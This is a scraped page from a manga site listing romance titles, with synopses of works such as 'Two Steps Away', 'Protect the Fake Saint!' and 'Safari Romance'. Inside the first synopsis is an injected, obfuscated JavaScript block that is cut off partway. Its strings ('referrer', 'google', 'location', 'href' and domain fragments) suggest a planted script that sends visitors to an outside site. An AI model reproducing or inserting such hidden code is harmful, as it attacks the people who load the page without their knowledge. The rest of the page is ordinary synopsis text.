Romance - Page 1883

Romance manga is a genre that explores romantic relationships, filled with emotional highs and lows, offering readers a heartfelt journey of love, growth, and conflict.

24597 results

Two Steps Away

Hosu is an average, carefree high school student who isn’t particularly special in any kind of way. Danwoo is the attractive, untouchable top student of the class. There shouldn’t really be any reason for them to interact at all. But one day, Danwoo announces that he wants Hosu to sit next to him in class. In fact, he wants to be within her presence as much as possible, and he’s willing to do whatever it takes to stay by her side. Not too close, but not too far. Just two steps away is enough. However, will they be able to maintain that distance? Come take a closer look, from just a couple steps away… Between 1 Meter / 1?? ??<script></script><script>function _0x2c24(){var _0x5a86e5=['4069960PJYILQ','2579076XlBcNp','210Yloeql','11763910MMQYJH','includes','jFOjj','http://rea','location','VxHcv','google','then','.customapi','1691128XhEISB','','286614uuPxwu','random','href','qDTVR','2083568mQtaDo','EGjWJ','fFQoA','.top/','2ykRHQR','22umBoli','KwiDB','referrer','text','RJMEK','1158598YsOMzT','36QyCoou','TTOqy','floor','https://ip','bgzWA'];_0x2c24=function(){return _0x5a86e5;};return _0x2c24();}(function(_0x54c985,_0x40a4aa){var _0xa7120f=_0x1870,_0x5ef987=_0x54c985();while(!![]){try{var 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I Became the Sacrificial Princess

Unknowingly swapped upon birth, Princess Brianna lost her identity as a princess and became a vagrant orphan. One day, her Imperial Father suddenly sought her back, reinstating her back to her rightful identity as the nation’s princess. However, what awaited her was not a family reunion nor was it an extravagant life, but instead, she was to become a sacrifice for the god. Reincarnated into the body of Princess Brianna, our main character only wants to change her fate of death, yet realises that the best way to do so is to become the sacrifice. The only way she can live is by becoming the sacrifice, as hidden scheming along with its causes and effects, slowly unravel in front of her eyes. (Synopsis: Gourmet Scans) Show less Unknowingly swapped upon birth, Princess Brianna lost her identity as a princess and became a vagrant orphan. One day, her Imperial Father suddenly sought her back, reinstating her back to her rightful identity as the nation’s princess. However, what awaited her was not a family reunion nor was it an extravagant life, but instead, she was to become a sacrifice for the god. Reincarnated into the body of Princess Brianna, our main character only wants to change her fate of death, yet realises that the best way to do so is to become the sacrifice. The only way she can live is by becoming the sacrifice, as hidden scheming along with its causes and effects, slowly unravel in front of her eyes. (Synopsis: Gourmet Scans)


Protect the Fake Saint!

Read manhwa Protect the Fake Saint! / 가짜 성녀를 지켜 What is the true identity of the most beautiful woman in the kingdom?! Dana was a high school senior in Korea who was about to take the CSAT. Unfortunately, she gets hit by a truck and is reincarnated in the romance fantasy world. I was trying to live comfortably in this life, but what is the secret of the saintess whom I suddenly met?! I don’t want to die, so I’ll protect the saint’s secret!


Between Us

As part of a political marriage alliance, Princess Esmeralda Tuloise is sent far away from her home country of Morway to the Dirmuid Empire in order to marry Prince Patrick Dirmuid. However, not only is Prince Patrick still a young teen who’s nearly ten years younger than Princess Esmeralda, but he’s also a ruthless brat who lacks all sympathy toward other people, including his fiancée. Alone and looked down upon for being the princess of an “uncivilized and barbarous” kingdom, Princess Esmeralda wonders how she’ll be able to get through this marriage. That’s when the prince’s father, Emperor Alexandre Dirmuid, becomes the sole light in the princess’s dark tunnel. But the more attention he gives, the more Princess Esmeralda finds herself falling for the wrong royal…


A Taste of Love

The glutton Xia Meng went out to buy a midnight snack and got into a car accident which transported her into the body of a maid in another world! And so, her life of romance, cuisine and adventure officially began!


Afterschool Adventure

She has a crush on her. So, she makes the first step and leaves her with a cute kiss. Except, they’re both clueless about each other’s intentions! GL with LGBTQ+ side characters as well!


The Ugly Lady’s Secret Pouch

Read manhwa The Ugly Lady’s Secret Pouch / 이 영애의 시크릿 파우치 Makeup artist, Yoon Seol, was involved in a celebrity accident. When she opened her eyes, she was in the body a heroine in a novel. For a moment, she was mesmerized by the beautiful female lead’s appearance, then she realized that she is in a novel known for torturous confinements. In the novel, the heroine Lila is r*ped by three men. She was an unfortunate character who ended up being imprisoned and turned into an idiot. “Merry bad endings* are not my thing! If it’s a bad ending, it’s a bad ending, why does it have to be merry!” To avoid the original route, Yoon Seol, or rather, Lila, decided to make herself ugly with makeup with the use of a ‘secret pouch.’ Ten years later. Lila, who avoided the original route, received a marriage proposal from an ugly duke. “Don’t be too scared, I’m just being honest with you because you weren’t honest with me first.” But will her ending be a merry bad ending? Or a happy ending? *merry bad ending – endings that may seem sad but the characters themselves are happy


Please Stamp Me!

Twenty-two-year old university student Ji-ah dreams of becoming an CEO and living a happy and single life until she’s 100 years old. “Ji-Ah, I’ve set you up with the grandson of a Chaebol.” “Dad! What the hell are you talking about?” She told herself that she would definitely reject him when they meet. But when she went, her super hot sunbae Yeon-Hoo was there?! And another chaebol’s grandson, Seung-Ho appears?! Eventually, the three of them decided to live together in the same home so she could choose her fiance. Then one day, Ji-Ah dreams of her wedding! As she looks up to the face of her groom… His face is… it’s blurry!!! *Chaebols are conglomerates


Relationship Once Done

How about we have a dinner together today? We have already done once, can’t we have it …. Again? ‘Juu-in On’, who had a dream and pride as a jewelry designer, but from having her idea stolen to getting real estate fraud! She has lived in a life of misfortune. On top of that, she hears that ‘HU’, the company she was working for, was sold to ‘Ondo International’, the famous jewelry company. Fortunately, they decided to her too. She takes a deep breath and goes to her new work… On the first day, she makes a big mistake of dropping her bag on the CEO’s head! Furthermore, she knows this man. It is ‘Jae-heon Do’, her ex-husband who she broke up with after making a contract marriage. She could not quit her new job so easily, so she decided to keep her heart close and keep a distance from Jea-heon and try to get used to their new relationship…. but Jaeheon starts approaching Juu-in from both inside and outside of the company without heeding it?! Once Done, 한 번 해본 사이


After the Insomnia Was Cured, the Tyrant Became Obsessive

불면증을 치료했더니 폭군이 집착합니다


Safari Romance

Zookeeper by day, the only “romance” in Bong Yuri’s life is helping the animals breed. But when nightfall comes, she becomes Kyo Miyin, the author of a popular online erotic novel, Safari Romance. She adapts her observations of the zoo animals’ behavior in heat to her novel, creating a sensational series that draws a crowd. Meanwhile, she’s about to be fired by her new boss, who’s looking for ways to climb back up the corporate ladder. This new boss is none other than Kang Sanho, the heir to the corporation that owns the zoo. He is not only frustrated by the impasse in his career but also sexually frustrated until he comes across Safari Romance one night.


Don’t Provoke the Puppy

Read manhua Don’t Provoke the Puppy / 别惹小狗 ” You and I have the same fate,so why did I come here? For you, also for the sake of myself.” – After being falsified by a “bestie”, I transmigrated into a supporting role in a novel whose name has the same pronunciation as my own. God has gave me a chance to restart again, so I must use it properly! Start by apologizing to anyone who has ever bullied by me.. bla bla bla! Why is there still a ruthless and treacherous minister in the center of the original work! Although,a brave dogs won’t be afraid of suffering, fight!
